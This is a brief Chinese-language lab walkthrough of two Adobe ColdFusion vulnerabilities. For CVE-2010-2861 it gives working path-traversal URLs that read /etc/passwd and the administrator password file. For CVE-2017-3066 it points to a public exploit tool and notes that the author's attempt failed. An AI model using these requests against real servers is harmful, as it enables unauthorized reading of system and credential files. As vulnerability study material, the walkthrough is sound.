Adobe ColdFusion

Adobe ColdFusion

简介：

Adobe ColdFusion是美国Adobe公司的一款动态Web服务器产品，其运行的CFML（ColdFusion Markup Language）是针对Web应用的一种程序设计语言。
Adobe ColdFusion 8、9版本中存在一处目录穿越漏洞，可导致未授权的用户读取服务器任意文件。
默认端口8500

Adobe ColdFusion 文件读取漏洞（CVE-2010-2861）

读取文件内容

直接访问http://your-ip:8500/CFIDE/administrator/enter.cfm?locale=…/…/…/…/…/…/…/…/…/…/etc/passwd%00en，即可读取文件/etc/passwd：

读取后台管理员密码http://your-ip:8500/CFIDE/administrator/enter.cfm?locale=…/…/…/…/…/…/…/lib/password.properties%00en：

Adobe ColdFusion 反序列化漏洞（CVE-2017-3066）

Adobe ColdFusion中存在java反序列化漏洞。攻击者可利用该漏洞在受影响应用程序的上下文中执行任意代码或造成拒绝服务。以下版本受到影响：Adobe ColdFusion (2016 release) Update 3及之前的版本，ColdFusion 11 Update 11及之前的版本，ColdFusion 10 Update 22及之前的版本。

这里直接使用现有的工具进行利用：

git clone https://github.com/codewhitesec/ColdFusionPwn.git

试了很多遍没成功显示版本号不支持？可能是环境出了点问题？等解决了再补上吧。